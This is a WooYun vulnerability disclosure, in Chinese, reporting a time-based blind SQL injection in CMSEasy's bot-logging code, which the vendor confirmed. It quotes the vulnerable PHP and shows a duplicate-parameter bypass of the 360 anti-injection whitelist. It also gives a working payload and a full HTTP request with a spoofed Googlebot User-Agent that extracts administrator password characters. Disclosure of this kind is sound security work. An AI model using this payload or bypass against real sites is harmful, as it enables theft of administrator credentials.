当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(10) 关注此漏洞

缺陷编号: WooYun-2014-66184

漏洞标题: Cmseasy某处SQL盲注漏洞(绕过360防护)

相关厂商: cmseasy

漏洞作者: Noxxx

提交时间: 2014-06-25 14:50

公开时间: 2014-09-23 14:52

漏洞类型: SQL注射漏洞

危害等级: 高

自评Rank: 20

漏洞状态: 厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 help@wooyun.org

Tags标签: php源码审核

1人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2014-06-25: 细节已通知厂商并且等待厂商处理中
2014-06-26: 厂商已经确认,细节仅向厂商公开
2014-06-29: 细节向第三方安全合作伙伴开放(绿盟科技唐朝安全巡航无声信息
2014-08-20: 细节向核心白帽子及相关领域专家公开
2014-08-30: 细节向普通白帽子公开
2014-09-09: 细节向实习白帽子公开
2014-09-23: 细节向公众公开

简要描述:

注入..但是木回显 盲注了..

详细说明:

index.php 84行

stats::getbot();

由于初始化的时候也没对$_SERVER做过滤的什么措施 导致的注入



stats.php 13行到78行

getbot 这个功能是看蜘蛛的记录

$_SERVER 没过滤

我们只需要把HTTP_USER_AGENT伪造成蜘蛛的就ok了

code 区域
public static function getbot() {
$ServerName = $_SERVER["SERVER_NAME"];
$ServerPort = $_SERVER["SERVER_PORT"];
$ScriptName = $_SERVER["SCRIPT_NAME"];
$QueryString = $_SERVER["QUERY_STRING"];
$serverip = $_SERVER["REMOTE_ADDR"];
$GetLocationURL=self::geturl();
$agent1 = $_SERVER["HTTP_USER_AGENT"];
$agent=strtolower($agent1);
$Bot="";
if(strpos($agent,"googlebot")>-1) {
$Bot = "Google";
}
if(strpos($agent,"mediapartners-google")>-1) {
$Bot = "Google Adsense";
}
if(strpos($agent,"baiduspider")>-1) {
$Bot = "Baidu";
}
if(strpos($agent,"sogou")>-1) {
$Bot = "Sogou";
}
if(strpos($agent,"yahoo")>-1) {
$Bot = "Yahoo!";
}
if(strpos($agent,"msn")>-1) {
$Bot = "MSN";
}
if(strpos($agent,"soso")>-1) {
$Bot = "Soso";
}
if(strpos($agent,"iaarchiver")>-1) {
$Bot = "Alexa";
}
if(strpos($agent,"sohu")>-1) {
$Bot = "Sohu";
}
if(strpos($agent,"sqworm")>-1) {
$Bot = "AOL";
}
if(strpos($agent,"yodaobot")>-1) {
$Bot = "Yodao";
}
if(strpos($agent,"iaskspider")>-1) {
$Bot = "Iask";
}
if(strlen($Bot)>0 &&!front::get('admin_dir')) {
$stats = self::getInstance();
$insert = $stats->rec_insert(array('bot'=>$Bot,'url'=>$GetLocationURL,'ip'=>$serverip,'time'=>date('Y-m-d H:i:s'))); //拼接语句 然后进入了查询 但是并没有回显 我们只好 盲注了。时间的..
}
}
public static function geturl() { 这里 初始化的时候没有过滤..
if(!empty($_SERVER["REQUEST_URI"])) {
$scrtName = $_SERVER["REQUEST_URI"];
$nowurl = $scrtName;
}else {
$scrtName = $_SERVER["PHP_SELF"];
if(empty($_SERVER["QUERY_STRING"])) {
$nowurl = $scrtName;
}else {
$nowurl = $scrtName."?".$_SERVER["QUERY_STRING"];
}
}
return (isset($_SERVER["HTTPS"])&&$_SERVER["HTTPS"] == "on")?'https://':'http://'.$_SERVER['HTTP_HOST'].$nowurl;
}





这里还有个引入了360防注入的 很好绕过



code 区域
$webscan_white_url = array(
array('index.php' => 'admin_dir=admin'),
array('index.php' => 'case=file'),
array('post.php' => 'job=postnew&step=post'),
array('edit_space_info.php'=>''),
array('index.php' =>'case=admin')
);



里面有个 url 白名单

我们只需要

ndex.php?case=file&case=index

这样就行了. case被后面覆盖了~



exP:

code 区域
/cmseasy/index.php?case=file&case=index&u=',(sELECT(IF(MID(PASSWORD,2,1)>'1',SLEEP(2),'OK'))FROM(cmseasy_operators)),'0')#

漏洞证明:

code 区域
GET /cmseasy/index.php?case=file&case=index&u=',(sELECT(IF(MID(PASSWORD,2,1)>'1',SLEEP(2),'OK'))FROM(cmseasy_operators)),'0')# HTTP/1.1
Host: **.**.**.**
User-Agent: Mozilla/5.0 (compatible; Googlebot/2.1; +http://**.**.**.**/bot.html)
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-cn,zh;q=0.8,en-us;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Connection: keep-alive





test.png



11.png



aaa.png

修复方案:

过滤

版权声明:转载请注明来源 Noxxx@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:20

确认时间:2014-06-26 12:26

厂商回复:

感谢,马上修正

最新状态:

暂无


漏洞评价:

对本漏洞信息进行评价,以更好的反馈信息的价值,包括信息客观性,内容是否完整以及是否具备学习价值

漏洞评价(共0人评价):
登陆后才能进行评分

评价

  1. 2014-06-25 14:55 | 大大灰狼 ( 普通白帽子 | Rank:278 漏洞数:64 | Newbie)
    1

    怎么绕过的??

登录后才能发表评论,请先 登录